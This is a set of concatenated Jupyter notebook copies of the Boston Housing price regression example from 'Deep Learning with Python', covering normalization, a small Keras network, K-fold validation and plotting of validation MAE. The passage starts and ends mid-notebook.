The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars: The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
print(train_data[0:2])
print(train_data[0:2].shape)
print(train_data[:2].mean(axis=0))
print(train_data[:2].mean(axis=0).shape)
mean = train_data.mean(axis=0) #NOTE: This scales for each feature separately
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64,
activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64,
activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k # Around 101 samples available in each fold
num_epochs = 100
mae_scores = []
mse_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
# This training data excludes the val_data but includes the other 3 splits
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
mae_scores.append(val_mae)
mse_scores.append(val_mse)
import matplotlib.pyplot as plt
plt.bar(range(k), mae_scores)
plt.xticks(range(k))
plt.xlabel("Fold (k)")
plt.ylabel("MAE")
plt.title("MAE scores for each fold");
mae_scores
mse_scores
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
k=4
num_epochs = 500
fold_epoch_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
fold_epoch_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
plt.figure(figsize = (10, 8))
plt.plot(range(num_epochs), fold_epoch_mae_histories[0], label="Fold 0")
plt.plot(range(num_epochs), fold_epoch_mae_histories[1], label="Fold 1")
plt.plot(range(num_epochs), fold_epoch_mae_histories[2], label="Fold 2")
plt.plot(range(num_epochs), fold_epoch_mae_histories[3], label="Fold 3")
plt.legend()
plt.title(f"MAE evolution for each fold \n Average MAE across folds is {np.round(np.mean(fold_epoch_mae_histories),3)}");
average_mae_history = [
np.mean([x[i] for x in fold_epoch_mae_histories]) for i in range(num_epochs)]
len(average_mae_history)
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Average Validation MAE across the 4 folds')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
4/4 [==============================] - 0s 1ms/step - loss: 17.4068 - mae: 2.6116
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
